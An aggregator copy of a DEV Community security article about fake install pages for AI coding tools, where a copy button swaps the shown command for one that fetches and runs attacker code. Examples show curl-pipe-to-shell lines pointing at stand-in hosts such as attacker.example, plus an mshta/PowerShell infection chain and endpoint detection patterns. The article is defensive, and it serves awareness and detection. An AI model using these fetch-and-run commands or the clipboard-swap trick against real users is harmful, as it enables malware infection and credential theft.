惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

博客园_首页
Spread Privacy
Spread Privacy
D
Docker
Stack Overflow Blog
Stack Overflow Blog
Google DeepMind News
Google DeepMind News
F
Fortinet All Blogs
F
Full Disclosure
美团技术团队
Y
Y Combinator Blog
N
Netflix TechBlog - Medium
Security Latest
Security Latest
C
Check Point Blog
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
罗磊的独立博客
A
Arctic Wolf
S
Schneier on Security
T
Threatpost
C
CERT Recently Published Vulnerability Notes
L
LangChain Blog
博客园 - 叶小钗
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
博客园 - 聂微东
T
The Exploit Database - CXSecurity.com
W
WeLiveSecurity
Engineering at Meta
Engineering at Meta
C
Cybersecurity and Infrastructure Security Agency CISA
GbyAI
GbyAI
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
H
Heimdal Security Blog
L
LINUX DO - 热门话题
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
O
OpenAI News
G
GRAHAM CLULEY
M
MIT News - Artificial intelligence
S
Security @ Cisco Blogs
博客园 - 司徒正美
N
News and Events Feed by Topic
Microsoft Azure Blog
Microsoft Azure Blog
Cisco Talos Blog
Cisco Talos Blog
P
Palo Alto Networks Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Schneier on Security
Schneier on Security
D
Darknet – Hacking Tools, Hacker News & Cyber Security
月光博客
月光博客
The Last Watchdog
The Last Watchdog
Apple Machine Learning Research
Apple Machine Learning Research
Microsoft Security Blog
Microsoft Security Blog
C
Cisco Blogs
雷峰网
雷峰网

DEV Community

Authentication Security Deep Dive: From Brute Force to Salted Hashing (With Java Examples) Why AI Systems Don’t Fail — They Drift Spilling beans for how i learn for exam😁"Reinforcement Learning Cheat Sheet" I Replaced Chrome with Safari for AI Browser Automation. Here's What Broke (and What Finally Worked) How Python Borrows Other People's Work The $40 Architecture: Processing 1 Billion API Requests with 99.99% Uptime Vibe Coding: A Workflow Guide (From Zero to SaaS) Most webhook security guides protect the wrong side. The scary part is delivery. Headless CMS for TanStack Start: Build a Blog with Cosmic EU Age Verification App "Hacked in 2 Minutes" — What Actually Happened Comfy Cloud’s delete function does not actually remove files Running AI Models on GPU Cloud Servers: A Beginner Guide Event-driven media intelligence with AWS Step Functions and Bedrock I scored 500 AI prompts across 8 quality dimensions — here's what broke How to Call Google Gemini API from Next.js (Free Tier, No Backend Needed) The Portal Protocol: Reclaiming Human Connection in the Age of AI How to Fix Your Team's Scattered Knowledge Problem With a Self-Hosted Forum Intro to tc Cloud Functors: A Graph-First Mental Model for the Modern Cloud Designing Multi-Tenant Backends With Both Ownership and Team Access I Built a Neumorphic CSS Library with 77+ Components — Here's What I Learned PostgreSQL Performance Optimization: Why Connection Pooling Is Critical at Scale Cómo construí un SaaS multi-rubro para gestionar expensas en Argentina con FastAPI + Vue 3 🚀 I Built an Ethical Hacking Scanner Tool – Open Source Project I Replaced /usage and /context in Claude Code With a Single Statusline A Pythonic Way to Handle Emails (IMAP/SMTP) with Auto-Discovery and AI-Ready Design I Collected 8.9 Million Polymarket Price Points — Here's What I Found About How Markets Really Move EcoTrack AI — Carbon Footprint Tracker & Dashboard Everyone's Using AI. No One Agrees How. 5 self-hosted ebook managers worth trying in 2026 Building Your First AI Agent with LangChain: From Chatbot to Autonomous Assistant Common SOC 2 Failures (Real World) Stop Vibe-Checking Your AI App: A Practical Guide to Evals How to Use SonarQube and SonarScanner Locally to Level Up Your Code Quality Your Next To-Do App Is Dead — I Replaced Mine with an OpenClaw AI Sign a Nostr event in 60 lines of Python using coincurve — no nostr-sdk, no nbxplorer, no rust toolchain ITGC Audit Explained Like You’re in Big 4 Patch Tuesday abril 2026: Microsoft parcha 163 vulnerabilidades y un zero-day en SharePoint Stop scraping everything: a better way to track competitor price changes Listing on MCPize + the Official MCP Registry while routing payments OUTSIDE the marketplace — how I kept 100% of my x402 revenue Building an AI-Powered Risk Intelligence System Using Serverless Architecture Why We Ripped Function Overloading Out of Our AI Toolchain Testing AI-Generated Code: How to Actually Know If It Works SaaS Churn Is Killing Your Business. Here Is What to Do About It (Without a Support Team) The Speed of AI Is No Longer Linear - And Self-Improving Models Are Why How to Implement RBAC for MCP Tools: A Practical Guide for Engineering Teams From Standard Quote to Persuasive Proposal: AI Automation for Arborists I built a CLI that scaffolds complete multi-tenant SaaS apps Axios CVE-2025–62718: The Silent SSRF Bug That Could Be Hiding in Your Node.js App Right Now The dashboard that ended our friendship Data Pipelines Explained Simply (and How to Build Them with Python) The Hidden Cost of AI Systems Nobody Talks About. undefined vs undeclared, and how typeof behaves Switching from file-based jobs to NATS/Kafka in Rust without changing code io_uring Adventures: Rust Servers That Love Syscalls Why Agentic AI is Killing the Traditional Database The POUR principles of web accessibility for developers and designers Quantum Neural Network 3D — A Deep Dive into Interactive WebGL Visualization How To Install Caveman In Codex On macOS And Windows Automation Pipeline Reliability: Why Your Workflow Breaks When Nobody Is Watching I Built an 'Open World' AI Coding Agent — It Works From ANY Folder From Freelancing to Product: A Tech Service Company's SaaS Transformation China's AI Giants: Adding Tencent Hunyuan & ByteDance Doubao to AI University (74 Providers) On the Vibe Coders and Their Lies clerk: Auto-Summarize Your Claude Code Sessions AI Weekly — 2026/04/10–04/17 | The Model Lockdown Is Here, but the Toolchain Is the Real Battleground AI 週報 — 2026/04/10–2026/04/17 模型封鎖潮來了,但工具鏈才是真戰場 Maybe this is how Open-Source apps are born... 🚀 Fine-Tune LLMs with LoRA and QLoRA: 2026 Guide tRPC v11 + Next.js App Router: End-to-End Type Safety Without the Boilerplate ShadCN UI in 2026: Why I Stopped Installing Component Libraries and Started Owning My Components SaaS Billing in React Server Components: Stripe + Supabase Without a Single `useEffect` Join our DEV Weekend Challenge — $1,000 in Prizes Across TEN winners! Submissions Due April 20 at 6:59 AM UTC. Implementing FSRS Spaced Repetition in Flutter + Supabase — Adding Memory Science to an AI Learning App "I Texted My Localhost From the Train — Claude Code Fixed the Bug Before I Got Home" I Built a Sales Prep AI and It Went Deeper Than Expected Design to Code #2: One JSON, Eleven Outputs Solving the 100M-Row Problem: A Summary Table Pattern for High-Volume Push Notification Logs Flutter Web With Wasm: What Actually Changes For Developers I Built 50 Royalty-Free Soundtracks for My Side Project in a Weekend Using AI Music Generation The Vibe Coding Security Checklist: 7 Things to Check Before You Ship Stop Letting Googlebot Guess Fix Your React App's SEO Right Desconstruindo o Streaming do LinkedIn: Como Criar um Engine de Extração de Vídeo de Alta Performance com HLS e FFmpeg (EDA Part-1) EDA (Exploratory Data Analysis) Explained With Real Life — Why Looking at Your Data Is the Most Important Step in Machine Learning Brand Relationship Management at Scale: Our 4-Touch Outreach System for 200+ Brands Why String.fromEnvironment() Might Return an Empty String in Dart JGuardrails 1.0.0 — Hardening Java LLM Apps Against Jailbreaks, Toxicity, and Prompt Injection Plan and Schedule a Full Week of Threads Content From One Claude Conversation Coding Cat Oran Ep3, Five Tables Changed Everything Updated: BFF Pattern I'm done watching freelancers get buried by 200 proposals. So I'm building the alternative. This is my first post BFS Algorithm in Java Step by Step Tutorial with Examples Tracking LLM Pricing Monthly: An Open Dataset for 22 AI Models How We Measure Content ROI on a Comparison Site: Revenue Attribution Without Perfect Data Introducing Nova AI Ops: The AI-Native Operating System for SRE Teams I built a free desktop video downloader for Windows — Grabbit How Talkie OCR Helps Vision-Impaired & Dyslexic Users Read the World Around Them VRCFaceTracking安装和iPhone面捕配置教程,有bug Even CrowdStrike Can't See Your Agents The Automation Gold Rush: What n8n Workflows and Claude Are Opening Up for Developers Right Now
Fake AI Installers: When "Installing Claude" Turns Into Running Malware
Nikolay Kuzi · 2026-05-07 · via DEV Community

A practical security case study about fake AI tool install pages, clipboard command substitution, and why copy-pasting terminal commands from search results has become a real workstation risk.

Introduction

This is not a Claude vulnerability.

It is not a story about "AI tools are dangerous" either.

It is about a much more ordinary problem:

developers are used to copying install commands from the browser into the terminal

Enter fullscreen mode Exit fullscreen mode

Attackers are now abusing that habit.

The old phishing pattern was familiar: a fake login page, a malicious attachment, a suspicious document, a password reset email.

The newer developer-focused pattern looks different:

fake documentation
fake install page
fake copy button
malware instead of install.sh

Enter fullscreen mode Exit fullscreen mode

The victim does not need to open a suspicious attachment.

They search for an AI development tool, click a sponsored result, land on a page that looks like documentation, copy a terminal command, and run it.

It feels like installing a normal CLI tool.

But it can be the start of a malware infection chain.

The attack pattern: InstallFix

Push Security described this pattern as InstallFix.

The idea is simple:

  1. An attacker clones an installation page for a popular developer tool.
  2. The page looks close enough to legitimate documentation.
  3. The install commands are modified.
  4. Traffic is driven through Google Ads or other malvertising channels.
  5. The user copies and runs the command manually.
  6. The "installer" executes attacker-controlled code.

This is related to ClickFix, but the pretext is different.

In ClickFix, the user is often tricked into "fixing" something: a CAPTCHA, a browser issue, a broken access flow, or a fake system error.

In InstallFix, nothing is broken.

The user already wants to install legitimate software.

That is what makes the attack so effective.

Why AI tools are a good lure

AI developer tooling is moving fast.

People are installing Claude Code, ChatGPT-related tools, Cursor extensions, MCP servers, local agents, CLI wrappers, browser extensions, desktop clients, and small automation packages around LLM workflows.

In many teams, this does not always go through a formal internal approval process.

The real workflow often looks like this:

a colleague mentions a tool
someone searches for the install guide
the first result looks right
they copy the command
they run it

Enter fullscreen mode Exit fullscreen mode

For an attacker, this is almost perfect:

  • the tool is popular and timely;
  • users expect to see terminal commands;
  • sponsored results can appear above organic results;
  • documentation pages are easy to imitate;
  • the install command can look normal;
  • the user may be redirected to a real page afterward and notice nothing.

Kaspersky and Push Security have both described campaigns where fake install pages were promoted through search ads and imitated installation instructions for Claude Code or similar AI tooling.

The important point is this:

the lure is not the AI model itself
the lure is the developer installation workflow

Enter fullscreen mode Exit fullscreen mode

A realistic case: installing Claude through install.sh

Imagine a developer wants to install an AI coding assistant.

They search for:

Claude Code install

Enter fullscreen mode Exit fullscreen mode

At the top of the search results, they see a sponsored link.

The domain looks plausible:

claude-code-docs.example
claude-code-install.example
claude-update.example

Enter fullscreen mode Exit fullscreen mode

The page looks like documentation:

  • logo;
  • sidebar;
  • quickstart section;
  • OS tabs for macOS, Linux, and Windows;
  • a copy button;
  • a short terminal command.

On the page, the visible command may look like this:

curl -fsSL https://claude.ai/install.sh | sh

Enter fullscreen mode Exit fullscreen mode

But the visible command and the clipboard command do not have to be the same.

For example, the page can display:

curl -fsSL https://claude.ai/install.sh | sh

Enter fullscreen mode Exit fullscreen mode

But after the user clicks Copy, the clipboard may contain:

curl -fsSL https://download.example.invalid/install.sh | sh

Enter fullscreen mode Exit fullscreen mode

Or:

curl -fsSL https://download.example.invalid/bootstrap | sh

Enter fullscreen mode Exit fullscreen mode

In a real campaign, the attacker domain would be more convincing.

The point is not the exact URL.

The point is that the user trusts the page UI instead of verifying the pasted command before pressing Enter.

Where JavaScript comes in

Most documentation pages show a command as text and provide a Copy button.

That button can copy a value that is different from the text the user sees.

Conceptually:

visible text:
  curl -fsSL https://official.example/install.sh | sh

clipboard value:
  curl -fsSL https://attacker.example/install.sh | sh

Enter fullscreen mode Exit fullscreen mode

An attacker can make this more subtle:

  • show a legitimate-looking domain in the page;
  • copy an attacker-controlled URL into the clipboard;
  • add base64 decoding;
  • add silent flags;
  • choose payloads based on OS;
  • change the command only for selected geographies or organizations;
  • change the copied command only when the visit comes from an ad campaign.

So "I saw the correct command on the page" is not enough.

The only thing that matters is what is actually pasted into the terminal.

That sounds basic.

But this is exactly the kind of basic thing that breaks under speed and trust.

Windows scenario: mshta and PowerShell

On Windows, these campaigns often use living-off-the-land binaries.

A simplified infection chain can look like this:

browser / user paste
  -> PowerShell
  -> mshta.exe
  -> remote HTA or script
  -> cmd.exe or PowerShell stager
  -> fileless payload
  -> persistence or credential theft

Enter fullscreen mode Exit fullscreen mode

In campaigns around fake Claude Code installers, researchers observed patterns involving mshta.exe, PowerShell, staged execution, obfuscation, AMSI bypass attempts, browser data theft, and infostealer behavior.

The key point is that the victim does not need to download and double-click a suspicious setup.exe.

They can run one copied command, and that command can fetch the rest.

From a detection perspective, this may look less like "a malicious file from email" and more like user-driven terminal activity.

That is why behavior matters.

macOS and Linux scenario: curl-to-shell

On macOS and Linux, the familiar pattern is:

curl -fsSL https://example.com/install.sh | sh

Enter fullscreen mode Exit fullscreen mode

or:

curl -fsSL https://example.com/install.sh | zsh

Enter fullscreen mode Exit fullscreen mode

This is convenient.

That is exactly why it is dangerous.

The command means:

download a remote script and execute it immediately

Enter fullscreen mode Exit fullscreen mode

If the domain is official and the script is expected, this is a common developer workflow.

If the domain is replaced, this becomes remote code execution performed by the user.

The problem is not curl.

The problem is that the trust boundary becomes:

I trust this web page and its copy button

Enter fullscreen mode Exit fullscreen mode

That is a weak boundary.

Why sponsored search results make this worse

Many users still treat Google Ads as a sign of legitimacy.

The mental shortcut is:

if it is at the top of Google, it is probably fine

Enter fullscreen mode Exit fullscreen mode

That is a dangerous shortcut.

Malvertising works because the user initiates the search. There is no phishing email. No strange attachment. No random message from a stranger.

The user wanted to install the tool.

So they are less suspicious.

This is especially risky in a corporate environment.

A developer workstation may contain:

  • source code;
  • SSH keys;
  • browser sessions;
  • password manager sessions;
  • Git credentials;
  • cloud CLI tokens;
  • kubeconfig files;
  • CI/CD access;
  • internal documentation;
  • VPN access.

An infostealer on that machine is not just "one infected laptop".

It can become an entry point into the organization.

How this differs from a classic fake installer

A classic fake installer looks like this:

download setup.exe
run installer
get malware

Enter fullscreen mode Exit fullscreen mode

InstallFix is more subtle.

It abuses a normal developer habit:

documentation says copy this command
I copy the command
I run the command

Enter fullscreen mode Exit fullscreen mode

For a developer, this does not feel like running a random executable.

It feels like installing a CLI tool from documentation.

That is why security awareness should not stop at:

do not open suspicious executables

Enter fullscreen mode Exit fullscreen mode

It also needs to say:

terminal commands copied from the browser are code execution

Enter fullscreen mode Exit fullscreen mode

What to check before running install commands

A practical checklist for users:

  1. Do not use sponsored results to install developer tools.
  2. Open official documentation from a known source.
  3. Check the domain inside the command, not only the browser address bar.
  4. After pasting, read the command before pressing Enter.
  5. Avoid curl | sh when you do not understand what will be downloaded.
  6. When possible, download the script first and inspect it:
curl -fsSL https://official.example/install.sh -o install.sh
less install.sh
sh install.sh

Enter fullscreen mode Exit fullscreen mode

  1. Use a disposable VM or container for tools you do not trust yet.
  2. Do not test new AI tools on a workstation that holds production secrets.

This is not about paranoia.

It is about treating remote installation commands as code execution.

Because that is what they are.

What teams can do

Awareness alone is not enough.

I would add a few practical controls.

Maintain an approved tool list

Teams should know where approved developer tools come from.

Example:

Claude Code:
  official docs: https://docs.anthropic.com/...
  expected package: @anthropic-ai/claude-code

Node.js:
  official site: https://nodejs.org/
  internal mirror: https://nexus.example.com/...

Homebrew:
  official site: https://brew.sh/

Enter fullscreen mode Exit fullscreen mode

If someone finds an installation guide through a sponsored ad, that should be a reason to stop.

Provide internal installation docs

For common tools, internal documentation helps a lot.

It should answer:

  • how to install the tool;
  • which command is approved;
  • which domain is expected;
  • whether a hash or signature should be checked;
  • where to ask for help if the install fails.

This matters especially for AI tools.

People will try them anyway.

If the company does not provide a safe path, employees will find an unsafe path.

Use DNS and web controls

Useful controls include blocking or flagging:

  • newly registered domains;
  • suspicious lookalike domains;
  • known malicious domains;
  • ad-delivered installer pages;
  • direct access to suspicious payload hosts.

This will not stop every campaign.

Attackers rotate infrastructure quickly.

But it is still a useful layer.

Endpoint detections

On Windows, I would monitor for patterns such as:

browser -> powershell
browser -> cmd
powershell -> mshta
mshta -> cmd
mshta -> powershell
PowerShell with encoded commands
PowerShell AMSI tampering
new scheduled task near install activity
unexpected outbound traffic from scripting hosts

Enter fullscreen mode Exit fullscreen mode

On macOS and Linux:

shell spawned from browser-adjacent activity
curl or wget downloading scripts to /tmp
chmod +x on a fresh download
execution from /tmp
unexpected launch agents
unexpected shell profile modification

Enter fullscreen mode Exit fullscreen mode

Context matters.

curl is not malware.

PowerShell is not malware.

But a browser-driven install flow, a suspicious domain, an obfuscated command, and persistence behavior together are a different story.

Why AppSec and DevSecOps should care

At first glance, this looks like endpoint security and awareness.

But it matters for AppSec and DevSecOps too.

Developer workstations often have access to the software supply chain:

  • Git repositories;
  • package registries;
  • container registries;
  • CI/CD variables;
  • deployment configuration;
  • signing keys;
  • cloud credentials;
  • kubeconfig files.

If an infostealer gets browser sessions or local credentials, the next step can be a supply chain incident.

That is why Secure SDLC should include workstation and tooling hygiene:

  • approved source lists for developer tools;
  • no installation from sponsored results;
  • internal installation guides;
  • sandboxing for new AI tools;
  • endpoint telemetry on developer machines;
  • least-privilege developer tokens;
  • short-lived credentials;
  • separate production credentials;
  • regular review of local secrets and kubeconfigs.

This is not about fighting Claude.

It is about developer workstation security.

Incident response checklist

If someone already ran a suspicious install command:

  1. Stop using the workstation.
  2. Isolate the endpoint from the network or through EDR.
  3. Preserve the command, URL, browser history, and time window.
  4. Review the process tree: browser, shell, PowerShell, mshta.exe, cmd.exe, curl, zsh.
  5. Check persistence: scheduled tasks, launch agents, startup items, shell profiles.
  6. Review outbound connections.
  7. Treat browser sessions and tokens as potentially compromised.
  8. Rotate credentials:
    • Git;
    • GitHub or GitLab;
    • cloud;
    • container registry;
    • package registry;
    • password manager session, if relevant.
  9. Review recent repository and CI/CD activity.
  10. Rebuild the workstation if cleanup confidence is low.

If this is an infostealer, deleting one file is not enough.

Credentials may already be gone.

What this does not solve

Checking install commands does not replace:

  • endpoint protection;
  • DNS filtering;
  • secure web gateways;
  • least privilege;
  • credential rotation;
  • EDR telemetry;
  • software allowlisting;
  • internal package mirrors;
  • developer security training.

It solves one specific gap:

people should not blindly execute code from a page they reached through an ad

Enter fullscreen mode Exit fullscreen mode

That gap is small, but it is real.

Closing

InstallFix is uncomfortable because it does not need a sophisticated exploit.

It abuses normal developer behavior.

We trained people to do this:

copy command from docs
paste into terminal
press Enter

Enter fullscreen mode Exit fullscreen mode

Attackers replaced the docs.

Or the command.

Or the clipboard value.

That can be enough.

So the rule I use is simple:

an install command from the browser is code execution

Enter fullscreen mode Exit fullscreen mode

Treat it like code:

  • verify the source;
  • verify the domain;
  • read the command after pasting;
  • do not trust sponsored results;
  • do not run unknown install.sh scripts on workstations with secrets;
  • provide an approved internal path for popular tools.

This is a small habit.

But it can be the difference between installing a developer tool and running an infostealer on a developer workstation.

References